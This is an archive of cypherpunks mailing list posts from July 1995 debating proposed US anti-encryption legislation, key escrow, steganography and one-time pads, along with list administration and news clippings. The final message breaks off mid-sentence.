Content-Type: text/plain


>Date: Wed, 12 Jul 95 18:20:07 -0400
>From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>

>Finally, we begin to see the attack on all forms of un-escrowed
>encryption.  The bill provides an affirmable defense of
>giving the keys to the government ahead of time!
>
>       `(c) It shall be an affirmative defense to prosecution under this
>     section that the software at issue used a universal decoding device
>     or program that was provided to the Department of Justice prior to
>     the distribution.'.


This isn't escrowed encryption being allowed here.  This is straight giving
of keys (or a back door) to the gov't.  Even Clipper fails this test.

 - Carl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 14 Jul 95 19:39:53 PDT
To: cjl <cypherpunks@toad.com>
Subject: Re: ping
Message-ID: <v01520d02ac2cc63e11c9@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:13 7/14/95, cjl wrote:
>Cypherpunks,
>
>It was my intention to write a little summary of the story in the most
>recent issue of SCIENCE

Can you scan it in?

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Fri, 14 Jul 95 11:05:38 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <v01510103ac2b52dbb0ac@[193.74.217.16]>
MIME-Version: 1.0
Content-Type: text/plain


>---------- Forwarded message ----------
>Date: Wed, 12 Jul 1995 15:28:25 -0400
>Subject: Anti-Electronic Racketeering Act of 1995
>
>

>      "(2) to distribute computer software that encodes or encrypts
>    electronic or digital communications to computer networks that the
>    person distributing knows, or reasonably should know, is accessible to
>    foreign nationals and foreign governments, regardless of whether such
>    software has been designated nonexportable."

Christ, these guys are so predictable.  What do want to bet that the last
clause of that paragraph was put in, just so it could be taken out?

Netscape, Apple, Novell et al testify before Congress; complain that their
crippled crypto has already been approved for export; they'll lose so much
money in sales, blah blah blah.  Grassley smiles for the camera, says "I'm
a reasonable man", strikes out the last clause.

Isn't democracy wonderful?

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: unicorn@polaris.mindport.net (Black Unicorn)
Date: Thu, 13 Jul 95 17:15:55 PDT
To: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Subject: Re: OTP server..
Message-ID: <v02130500ac2cc7c4390a@[205.219.167.38]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>How about WWW one time pad servers? You browse to your
>favorite OTP server, which has a random number generator
>running in the background. You tell it to give you a block
>of X bytes, and mail it to persons 1, 2, 3, ... N.
>
>These people then use this OTP for encrypting a document.
>It wouldn't be illegal because you aren't encoding any data
>and distributing it.. You're generating raw data. You wouldn't
>have to distribute any crypto software, you just xor your
>data file with the number of bytes that you were sent
>in the mail from the OTP server.. Enough of these things
>would be REALLY tough to monitor.. Plus, you could connect
>8 different times and just pick one of the sets.. Or you
>could just use a portion of the set that you and the receiving
>party agreed upon.
>
>Or, instead of using email, you could have a application/x-otp
>browser that would collect the OTP that the server sent out
>to you over HTTP. (this would be really hard to differentiate
>from other data if the server was doing other things at the
>same time).
>
>Thoughts?
>

I think you're trusting the server a GREAT deal.



> Doug Hughes                            Engineering Network Services
> doug@eng.auburn.edu                    Auburn University

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMAcXby1onm9OaF05AQEUpggApWiVdcA4UAsVIXKEor3JnM6PkEZleO6b
CpbyXYVZNRmUuePTuUMf9KQkI0accFm/sjnc7t12Hujs60utILWYM2F71GSrHZ0/
POx/oExL5TgcR9m6e0cYM58k9xZT2golXXHukTXnU6FlCNSNMfWnBziTgsSwCj1q
mZO8xQnbSWteWL50g7cFBMvGbyDSygOZu9MPqzRRvUVoF/kL78G0SAwT8HzGadfk
yIV40wDicBfuPH1GcaPlbGW+0Adips0WHAETBSRmUXSBdu+uQcs6LhEhddvbKmzF
Rh4qpIR0FYKcnyax0kqk6eBBWqo7oVCdm9nYMHc2yg6I9dQLGWnQIA==
=b9lf
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Fri, 14 Jul 95 17:23:14 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Stego Standards Silly ? (Was: Re: def'n of "computer network")
Message-ID: <9507150023.AA10363@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hugh seems to have restored the full list on Majordomo, so I'll forward the
last couple of messages I sent/received yesterday that should have gone to
the whole list....

-Futplex

Forwarded message:
>From lmccarth Fri Jul 14 00:12:07 1995
Subject: Stego Standards Silly ? (Was: Re: def'n of "computer network")
To: cypherpunks@toad.com (Cypherpunks Mailing List)
In-Reply-To: <9507140229.AA13447@snark.imsi.com> from "Perry E. Metzger" at Jul 13, 95 10:29:29 pm

-----BEGIN PGP SIGNED MESSAGE-----

.pm writes:
> Indeed -- how could the recipient even know to look, unless these
> things arrived regularly and with a fully standardized form of
> stegonography, in which case why bother, all you've done is come up
> with a very odd form of transfer encoding.

I agree, but AFAICS an odd form of transfer encoding is exactly what the
doctor ordered. For plausible cryptodeniability, one wants to send 
ciphertext using a transfer encoding that doesn't automatically ring alarm
bells. Steganography amounts to laundering Content-Type: headers.

> If the recipient does know to look, that implies either that there is
> a hint, in which case the stegonography is useless, or it implies that
> you have prearrangement, in which case my comments on prearrangement
> hold.

If the recipient isn't getting spammed with GIFs (or whatever), she (or
rather her MDA) can simply look at all of them by default. Of course this
does not help with anonymous message pools on the order of Usenet, but that
is a sub-issue.

Deranged Mutant raised an IMHO important issue a few months ago. He suggested
that Mallet could go about trashing the purportedly "random" bits in each
instantiation of some transfer encoding used in a stego standard. For
example, he shuffles the LSBs of every passing JPEG. I'm not sure how feasible
this would really be (both technically and sociopolitically), but it
could be a big annoyance if only a few people were suspected of using stego
method XYZ. 

The standard answer to agent-in-the-middle tampering is of
course digital signatures. Now, the question is, will we be allowed to sign
our possibly-stego-enclosing GIFs with reasonable confidence that the govt.
can't forge our signatures ? Obviously the signature itself can't be
stegoed, or else we fall into an infinite regress.

 -Futplex <futplex@pseudonym.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAXuSWf7YYibNzjpAQHlpQP/f3/e5iRl67zU3TLYZH1oNBBjC1+LYPH8
VkQMhvtRdlo2xBkY56jaZ6hZuzWanknVD1EKrG72vl5sPytXXDs5dVplFlelVw6f
VjC2UxNHe0dQHmmJqXNMMq4qlC8ZxgtNf4P9O+6iJKjz6SbA7F6LuRd+3TXv5tHm
xgGSY5bzJp8=
=ia+X
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Fri, 14 Jul 95 19:30:32 PDT
To: snet-l@world.std.com
Subject: Re:  Free The World Web Server project.. :)
Message-ID: <199507150229.UAA23961@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hooking up a mass mailer to congress seems like a bad idea to me, because
they're really only interested in their constituants. If they start getting
mass mailings, they might start thinking there's only one person or a
small group of people "behind the curtain". Sending results of an e-petition,
however, would be unobtrusive. A web page that mails a form letter to
_your_ congressperson's form-letter-readers (ie staff readers) would be
much better, IMHO.
 
Don




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: unicorn@polaris.mindport.net (Black Unicorn)
Date: Thu, 13 Jul 95 17:30:22 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: The end of public key cryptography as we know it?
Message-ID: <v02130501ac2ccb450beb@[205.219.167.38]>
MIME-Version: 1.0
Content-Type: text/plain


>-----BEGIN PGP SIGNED MESSAGE-----
>
>In article <199507132009.AA15283@tyrell.net>, pgf@tyrell.net (Phil
>Fraering       ) wrote:
>
>>   From: Doug Hughes <Doug.Hughes@eng.auburn.edu>
>>   Date: Thu, 13 Jul 1995 13:46:10 -0500
>>
>>   An article posted on sci.crypt stated that quantum factoring
>>   is real and that an article was posted in this month's Science
>>   magazine. The author of the post says this would make factoring
>>   a 10 bit number the same time as factoring a 100000000 bit number.
>>
>>You can bet your ass and your mother's and grandmother's donatable
>>organs that if this were possible, then the legislative initiatives
>>currently underway would not be: they'd just let us use RSA and get
>>a false sense of security.

You give them too much credit.

Still, there's always IDEA and suchlike.  The legislation would stand in
any event.


>Even with a quantum computer, factoring is still an extra step that is not
>required with GAK. Besides, factoring will always be more expensive than
>GAK, at least for the other side.
>
>- --
>- -- Lucky Green <mailto:shamrock@netcom.com>
>   PGP encrypted mail preferred.
>- ---
>[This message has been signed by an auto-signing service.  A valid signature
>means only that it has been received at the address corresponding to the
>signature and forwarded.]
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>Comment: Gratis auto-signing service
>
>iQBFAwUBMAW0VSoZzwIn1bdtAQG9QQF+OWci7VK8X9/ropNlf5dGW5/jbHWo+4cR
>2GvuYpDvoAbDRQmDcpFR7u8hBog7KIet
>=c/wa
>-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian A. LaMacchia <bal@martigny.ai.mit.edu>
Date: Fri, 14 Jul 95 18:28:39 PDT
To: cme@tis.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <9507142311.AA09635@tis.com>
Message-ID: <9507150128.AA16854@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Fri, 14 Jul 95 19:11:39 EDT
   From: Carl Ellison <cme@tis.com>
   Cc: cypherpunks@toad.com
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

[I've combined parts of Carl's two recent messages...]

   I believe that the concern about defining predicate acts this way comes
   from the RICO requirement that there be TWO instances of a crime in order
   to pass the test of perpetrating a *pattern of crime* and therefore be
   ranked as a mobster subject to RICO.  My guess is that the intent is that
   from one placement on an FTP server or one posting to a newsgroup, the
   perpetrator of that heinous act will have passed his RICO qualification and
   therefore be subject to having all he owns taken from him.

I agree with Carl here.  

   The crypto section has no GAK exclusion.  It makes it as illegal to release
   GAKed crypto on a net as PGP.

The proposed 1030A(c) provides a defense to prosecution under 1030A(a).
So if GAKed crypto satisfies 1030A(c) then it can be deployed without
fear of prosecution under 1030A(a).  It might still violate ITAR, of
course, although I suspect any system that satisfies 1030A(c) would be
granted a CJ.

   >       `(c) It shall be an affirmative defense to prosecution under this
   >     section that the software at issue used a universal decoding device
   >     or program that was provided to the Department of Justice prior to
   >     the distribution.'.

   This isn't escrowed encryption being allowed here.  This is straight giving
   of keys (or a back door) to the gov't.  Even Clipper fails this test.

Why doesn't GAK satisfy this clause?  Clearly if the keys are escrowed
with two Dept. of Justice entities (or if there's only one escrow agent
and it's a DOJ entity) then DOJ will have been provided with sufficient
information to decode any encryted information by themselves.  

Certainly commercial escrow systems (such as TIS's CKE[*] system with DRCs
(data recovery centers) and DRFs (data recovery fields)) could fail this
test, since the chosen escrow agents may not be subject to DOJ control.
But I could build a CKE system with an "overriding UI (user identifier)"
that had access to all the keys, and provide that UI to DOJ.  The
"universal decoding device" would then be to go to the DRC, present that
UI and the DRF and recover the desired information.

I don't see how Clipper fails the 1030A(c) test, except possibly for the
fact that the proposed escrow agents were not both within DOJ.  I think
that's a minor point.

					--bal

[*] See ftp://ftp.tis.com/pub/crypto/drc/papers/drc.ps, Carl's initial
description of the TIS CKE system.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Fri, 14 Jul 95 18:46:41 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Timothy C. May: Re: Crisis Overload (re Electronic Racketeering)
Message-ID: <9507150146.AA11209@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim's original transmission of the following message didn't make it out to
the (briefly annulled) list. I've already replied to Tim in private, but I'll
offer my apologies if I've misled anyone as to whose mail originally went
where.

-Futplex

Forwarded message:
> From tcmay@sensemedia.net Fri Jul 14 02:01:08 1995
> Date: Thu, 13 Jul 1995 23:03:50 -0700
> X-Sender: tcmay@mail.sensemedia.net
> Message-Id: <ac2b562c03021004310a@[205.199.118.202]>
> Mime-Version: 1.0
> Content-Type: text/plain; charset="us-ascii"
> To: futplex@pseudonym.com, cypherpunks@toad.com
> From: tcmay@sensemedia.net (Timothy C. May)
> Subject: Re: Timothy C. May: Re: Crisis Overload (re Electronic Racketeering)
> 
> At 2:57 AM 7/14/95, L. McCarthy wrote:
> >> Perry,
> >>
> >> I have all I'm going to take of your acerbic rudeness to me.
> >>
> >> I will no longer be responding to any of your messages.
> >>
> >> --Tim
> >
> ><sigh>
> >
> >Everybody needs to take a deep breath and count to 1,000. Seriously,
> >we're all feeling plenty of stress today. Various people have been
> >talking about getting out of the U.S. while the going's good (?), and
> >it doesn't sound much like hyperbole this time. It's not surprising that
> >we're releasing our frustration on each other, lashing out at the nearest
> >quasi-tangible targets.
> 
> Note that I didn't post that to the list.
> 
> Your requoting it, without the intermediate quoting of the person who _did_
> post it to the list, makes it appear I was spewing this garbage to the
> list, when I wasn't.
> 
> I don't care for your pop psychology. I would've followed your advice and
> left these comments in e-mail only, had you done the same.
> 
> --Tim May
> 
> ..........................................................................
> Timothy C. May         | Crypto Anarchy: encryption, digital money,
> tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
> 408-728-0152           | knowledge, reputations, information markets,
> Corralitos, CA         | black markets, collapse of governments.
> Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
> "National borders are just speed bumps on the information superhighway."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Buzz@static.noise.net (Buzz White)
Date: Sun, 16 Jul 95 02:12:03 PDT
Subject: The Recent Flurry of Anit-Crypto Activity... Why?
Message-ID: <3u6oj5$fir@nntp.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anybody given thought to the reasons behind this..

More to the point, the question  "Why Now?" comes to my mind.

It generally takes (criminal) legislation a couple of years to be effective,
i.e. get hammered out, passed, and entered into the US Code by the
legislature, then get acted upon by local DA's, then have a court case come
to a successful conclusion for the lawmakers.

Well, if anybody bothers to look, over the next 2-5 years, some very
significant US patents expire concerning crypto - and this opens the door
for a truly widespread integration of "difficult" crypto into commonly used
systems, by "big name" software manufacturers, who have heretofore shied
away due to patent infringement fears (and ITAR restriction, which will
hopefully soon fall due to the courts).  

Lets face it - the real reason that public key crypto hasn't gone over (here
in the US) is that there has only been generally ONE source of commercial
public key crypto - and they are not concerned with doing anything in a
competitive nature (other than using civil lawsuit threats to maintain their
monopoly).  Shareware and Freeware are great, but it is hard to get most
companies to accept them for general usage (The arguments I have had with
clients just to get them just to accept binaries compiled with GCC,
jeezus!).  And Shareware/Freeware (with a few notable exceptions) products
do not usually have that "slick" consumer (i.e. computer illiterate)
oriented interface that most non-technical users need.  As an example,
compare how simple the Mac and Windows interfaces are for the most
successful  products, then look at the interface to PGP - even via Private
Idaho and WinPGP or WinFront it is kluge-y.  So commercial adaptation is our
ultimate best hope (until then, Shareware/Freeware and PGP are our ONLY
hope).

[climbing into pulpit]
So, I posit that this legislative swirl is an attempt to squash true "crypto
for the masses" (via real commercial integration) before it gets out "into
the world".  The C-Punks have midwifed (sp?) this one, and seen to it that
crypto has survived its infancy and is thriving in childhood (PGP), but to
get it to finally grow up and go out into the world on its own, it needs to
be commercially viable.  That mean no hassles over the algorithms, etc.  The
next few years could see crypto leave our loving environment and flourish,
or see it get ambushed by government agents with shotguns on the doorstep.
That is what our next fight should be -- to delay these laws until they are
too late.  For once we get crypto truly running free and loose, there will
be no way to reign it in again.
[climbing out of pulpit]

Anybody have a better analysis of the "Why Now" part of the question?  I'd
love to hear a better reasoned (possibly not as paranoid) opinion, as this
one just occurred to me -and I kinda flung it out here without too much
forethought.  And as for the ambush  metaphor, ask somebody about Randy
Weaver's wife...

Buzz

--
Liberals and Conservatives differ only in what they regulate
and which part of government power they increase.  One wants
to control your money, the other your soul.
No Thanks - I'll keep my money and my soul for myself.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 14 Jul 95 20:12:23 PDT
To: cypherpunks@toad.com
Subject: MYS_fit
Message-ID: <199507150312.XAA23783@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-14-95. NYPaper Page Oner:


   "2 Groups of Physicists Produce Matter That Einstein
   Postulated."

      By chilling a cloud of atoms to a temperature barely
      above absolute zero, scientists at a Colorado laboratory
      have at last created a bizarre type of matter that had
      eluded experimenters ever since its potential existence
      was postulated by Albert Einstein 70 years ago. The
      creation of this Bose-Einstein condensate -- named for
      Einstein, and the Indian theorist Satyendra Nath Bose --
      was hailed yesterday as the basis of a new field of
      research expected to explain some fundamental mysteries
      of atomic physics. A Texas group later produced similar
      results. The achievement should allow physicists to peer
      directly into the realm of the ultrasmall.     MYS_fit


   [This was also reported in The Economist of July 1.]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 14 Jul 95 20:13:51 PDT
To: cypherpunks@toad.com
Subject: SEK_hel
Message-ID: <199507150313.XAA23951@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-14-95. NYPaper:


   "U.S. Spells Out Antitrust Inquiry Into Microsoft."

      The Justice Department said today that the Microsoft
      Corporation might well be violating antitrust laws by
      including software for its new on-line network in
      Windows 95, its much-anticipated operating system for
      personal computers.                            JUS_kid


   "Sting on Internet Leads to a Child Sex Case."

      In a case involving child pornography, the Internet and
      a self-appointed enforcer whom one critical defense
      lawyer calls an "electronic vigilante," a Nevada man is
      facing prison for crossing state lines with the
      intention of having sex with a 14 year-old girl he had
      met on a popular computer network.             SHE_dev


   [Editorial] "The Guns of Waco and Ruby Ridge."

      There is little doubt that the Federal Government
      contributed heavily to two of the biggest law
      enforcement fiascoes in recent memory. One was the
      disastrous 1993 Federal raid on the Branch Davidian
      compound at Waco, Tex. The other was the tragic 1992
      encounter between the F.B.I. and a band of white
      separatists at Ruby Ridge, Idaho.              LIT_bub



   3:  SEK_hel









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Fri, 14 Jul 95 23:52:09 PDT
To: cypherpunks@toad.com
Subject: Re: ADMIN: List wipeout and recovery
Message-ID: <ac2cb2180f021004ef06@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:12 AM 7/15/95, Hugh Daniel wrote:
>to fixit.  Using two heads was better than one and we realized that we
>had a online backup only 2 days old.  Minutes later it was installed
                          ^^^^^^^^^^^
>and the list is back to where it was late on 1995/07/11.

I think your backup is a lot older than 2 days old, as a "who cypherpunks"
request showed this as my list address:

....
talon57@well.sf.ca.us
tcmay@netcom.com (Timothy C. May)
tentacle@hclb.demon.co.uk
....

I haven't been subscribed as "tcmay@netcom.com" since mid-June. Since
mid-June I've been subscribed as "tcmay@sensemedia.net".

Why did I get this message at my sensemedia.net address if in fact "who
cypherpunks" shows my subscription address is only at Netcom? Beats me. I
checked and I am not subscribed under both addresses, and a grep of the
"who cypherpunks" list doesn't show a sensemedia.net address for me. Maybe
the "who cypherpunks" at 16:21 today is a different backup list than the
supposedly 2-day old list.... Something for the X Files, perhaps.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Allen Robinson <sebaygo@intellinet.com>
Date: Fri, 14 Jul 95 22:03:43 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <Pine.3.89.9507150010.A21948-0100000@sibyl.intellinet.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm posting this again, not because I think it contains any
particularly profound insights, but rather because I initially
sent it around midnight last night and it was not reflected
here so I suppose it did not make it out.

AR

---------- Forwarded message ----------
Date: Fri, 14 Jul 1995 00:12:14 -0500 (CDT)
From: Allen Robinson <sebaygo@intellinet.com>
To: Ray Arachelian <sunder@escape.com>
Cc: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)

On Thu, 13 Jul 1995, Ray Arachelian wrote:

> On Thu, 13 Jul 1995, L. McCarthy wrote:
> 
> > Mr. GRASSLEY. Mr. President, I rise this evening to introduce the
> > Anti-electronic Racketeering Act of 1995. This bill makes important changes
> > to RICO and criminalizes deliberately using computer technology to engage in
> > criminal activity. I believe this bill is a reasonable, measured and strong
> > response to a growing problem. According to the computer emergency and
> > response team at Carnegie-Mellon University, during 1994, about 40,000
> > computer users were attacked. Virus hacker, the FBI's national computer
> > crime squad has investigated over 200 cases since 1991. So, computer crime is
> > clearly on the rise.
> 
> Eh, what do "virus hackers" have to do with encryption, why is it these 
> morons justify the destruction of encryption by mentioning hackers and 
> viruses?

The use of terms such as "virus" and "hacker" in a context such
as this has little or nothing to do with what the terms actually
mean.  It's palpably obvious that they are being bandied about
here solely for the knee-jerk emotional reactions they evoke.
Even those more computer/net clue-impaired than Grassley (assuming
that such is possible) know from watching TV and the movies that
a virus is a Bad Thing (tm) and that hackers are evil!
Pseudo-digital demagoguery.
 
> Additionally, does this mean that someone outside of the USA is in danger 
> of being grabbed by RICO armed thugs from Uncle Sam's cadre for writing 
> crypto software and publishing it in the open?  After all, once it winds 
> up on some USA site, how do we know that someone outside the USA got his 
> copy of SuperDuperNSASpookFree from a non-US site?  Just to be sure, 
> we'll bust both the site operator and nab the guy who wrote it next time 
> he drops in, or hell, we'll have him extradited.  

Or simply kidnap him and escort him back to the U.S.
 
<snip>

> > I believe we need to seriously reconsider
> > the Federal Criminal Code with an eye toward modernizing existing statutes
> > and creating new ones. In other words, Mr. President, Elliot Ness needs to
> > meet the Internet.
> 
> Where is Elliot Ness?  I don't see any mafia.org on the net.  Anyone here 
> see any such site?

It might be even more beneficial if Senator Grassley and the other
members of our august deliberative bodies would meet the internet.
My gut reaction to the recent tide of legislation is that they are
seeking to stangle what they fear and that they fear what they do
not understand.  (Too melodramatic?)
 
> > Mr. President, I sit on the Board of the Office of Technology Assessment.
> > That Office has clearly indicated that organized crime has entered cyberspace
> > in a big way. International drug cartels use computers to launder drug money
> > and terrorists like the Oklahoma City bombers use computers to conspire to
> > commit crimes.
>
> Was it not proven that McVeigh and Co. >DID NOT< use a computer?  THe AOL 
> account was a hoax, no?  Where are the hoardes of anti-USA terrorists, 
> and drug pushers on the net? 

You don't recognize them because they are masquerading 
as "virus hackers".

Again, the main reason for playing the "terrorist" card is
for the emotional hot-buttons they can push by so doing.
Since Grassley didn't use it, look for someone to introduce
something this session titled, "The Avenge Those Poor,
Innocent, Bloody Dead Children Act of 1995".

AR

%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%
"Government is not reason... it is force.  Like fire, it is a dangerous
servant and a fearful master."                      - George Washington
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Allen Robinson...................................sebaygo@intellinet.com
PGP public key AD022AA9   fingerprint 5A3BC05B2EC67724 F5664A20AEEAB07A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian A. LaMacchia <bal@martigny.ai.mit.edu>
Date: Fri, 14 Jul 95 21:08:58 PDT
To: cypherpunks@toad.com
Subject: S. 982 Kyl-Leahy(-Grassley) NII Protection Act
Message-ID: <9507150408.AA21123@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


S. 982 is "the other bill" introduced recently in the Senate, the
National Information Infrastructure Protection Act of 1995 (introduced
by Sens. Kyl, Leahy and Grassley).  Since it has bipartisan support plus
the support of the Attorney General I thought it might be a good idea to
see what it really does.

I've made available via WWW the following documents:

	The text of S. 982: The National Information Infrastructure Protection Act of 1995; 
        The text of 18 USC 1030 as it is currently; 
        The text of 18 USC 1030 as modified by S. 982; 
        Sen. Kyl's statement introducing S. 982; 
        Sen. Leahy's statement introducing S. 982; 
        A section-by-section analysis of S. 982 provided by Sens. Kyl and Leahy; 
 
All are available from my "Legal Issues" page at:

	http://www-swiss.ai.mit.edu/~bal/legal/

The "text of 18 USC 1030 as modified by S. 982" is perhaps the most
interesting, since it shows both text removed by the bill (in italics)
and text added by the bill (in boldface).

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Fri, 14 Jul 95 23:14:23 PDT
To: cypherpunks@toad.com
Subject: Re: MYS_fit
In-Reply-To: <199507150312.XAA23783@pipe3.nyc.pipeline.com>
Message-ID: <199507150614.AAA05933@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain




O.K., this is totally off any reasonable topic, but allow me the indulgence:

>    "2 Groups of Physicists Produce Matter That Einstein
>    Postulated."

I've been hanging around Carl Weiman's lab for a couple of years (a friend
of mine works on one of the projects), and this is one hell of an 
achievement. The apparatus they use sits on a tabletop, and you can
watch the gas through infared T.V. cameras in real time. The trap is just
a little vacuum chamber with windows in the side. They use the same
diode lasers that come in your C.D. player, an ingeniously inexpensive
setup. 

Yow!

                                  -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@xanadu.mindport.net>
Date: Fri, 14 Jul 95 21:39:32 PDT
To: cypherpunks@toad.com
Subject: Ssh and Macintosh applications.
Message-ID: <199507150535.AAA00185@xanadu.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



Having looked over the Ssh blurbs, I can't help but want to use it.  NOW.

Is anyone more skillful than I going to try and port some sort of support
for those of us who are using a Mac with, say, a direct connection to a
provider using Ssh?

Please?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bolivar Shagnasty <tj@compassnet.com>
Date: Sat, 15 Jul 95 01:05:16 PDT
To: cypherpunks@toad.com
Subject: Re: Crisis Overload (re Electronic Racketeering)
Message-ID: <Chameleon.4.01.2.950715030350.tj@tjunker.compassnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Originally sent to list during server failure:
---------------Included Message---------------

Perry Metzger wrote:

>"Robert A. Hayden" writes:
>> We've seen the enemy, that the are the 535 senators and representatives 
>> in D.C., and the staff in the White House.  It's time to shore up our 
>> allies and enter the battle witht he best weapons we have; information 
>> and popular use.
>
>As unpleasant as the congress is, it isn't the enemy. The governmental
>forces desiring control are not the same as the congress.

This is true.  IMNSHO we are witnessing yet another case of the 
representation of an illegitimate constituency.  Grassley is not representing 
the people of his state -- he is representing and carrying water for federal 
government interests.  While some people used to acidly refer to "The Senator 
from Texaco" and such, it is a much more common situation that some Senators 
and Representatives represent federal agencies in matters before their 
chamber that virtually NO VOTER would ever think of or could even discover as 
a matter of personal interest.  You can be sure Cathy Cornflower of Cherokee 
didn't start this by writing Grassley and suggesting that RICO be expanded to 
cover distribution of non-GAK crypto.  It is inconceivable that more than a 
tiny handful of Grassley's constituents would even recognize anything in his 
bill if stopped on the street and asked about it.

Agencies develop "friendly" congresscritters like the Soviets used to develop 
"friendly" journalists and politicos.  It wouldn't even be all that 
surprising if similar methods are used.  The "friendlies" take obscure and 
no-so-obscure issues before their house on behalf of the agencies.  At some 
level this is probably necessary, but with all those folks getting comfy with 
each other up there in Disneyland-on-the-Potomac, it's impossible that unholy 
alliances do not develop.  The "us vs them" mentality of a congresscritter 
grows to encompass all three branches under "us" and views the unwashed 
masses as "them."  In that view the suit from XYZ who comes over to confer 
with the staffers is "one of us."  He gets right in (while visiting 
constituents wait stupidly for an appointment that the elected official will 
be -- we're so sorry -- unable to keep).  He's bringing up an issue of 
concern to "us."  "We" have a problem that needs to be fixed by modifying 
para (a) of sec (3) to read "shall" instead of "may."  "We" will feel very 
important and may even win some special stroking or quid pro quo for fixing 
"our" problem.

The one real flaw in this is that the electorate was just left out of the 
loop, and kept in the dark to boot.  When the elected official went into "we" 
mode he ceased representing the people who sent him there.  In these 
increasingly totalitarian times it's likely his representation was 
distinctly CONTRARY to the interest of those who sent him there.

There have been cases of agencies approaching "their" congressman and having 
completely new language inserted in a conference bill -- language that was 
never in the original, never offered as an amendment until the bill from each 
house went to conference, and never debated when the conformed bills returned 
for final vote.  It's the norm that such maneuvers go completely unreported 
in the media.

>Congressmen are by and large harried and ignorant people. They have no
>idea what any of this is about. We have the choice of letting Louis
>Freeh do all the educating, or having a white shoe Washington PR firm
>do some of the educating, too. I favor the latter approach.

There is also something that is almost always overlooked... taking names.  It 
is possible to "pull on the string" and follow the visible event back to the 
less immediately visible actors.  The congresscritters, though by and large 
harried and ignorant, are not always guiltless.  At best they are willing 
agents for little bits and pieces of the fabric of overweening statism.  In 
every case, though, there are faceless staffers who may also be harried but 
are usually NOT ignorant.  The staffers are often the ones who "sell" the 
congresscritter on signing onto this or that non-voter issue for this or that 
self-serving political reason.  Staffers also include the people with huge 
political axes to grind -- people who gravitate to the positions of writing 
the text of the bills that translate the generality to which the elected 
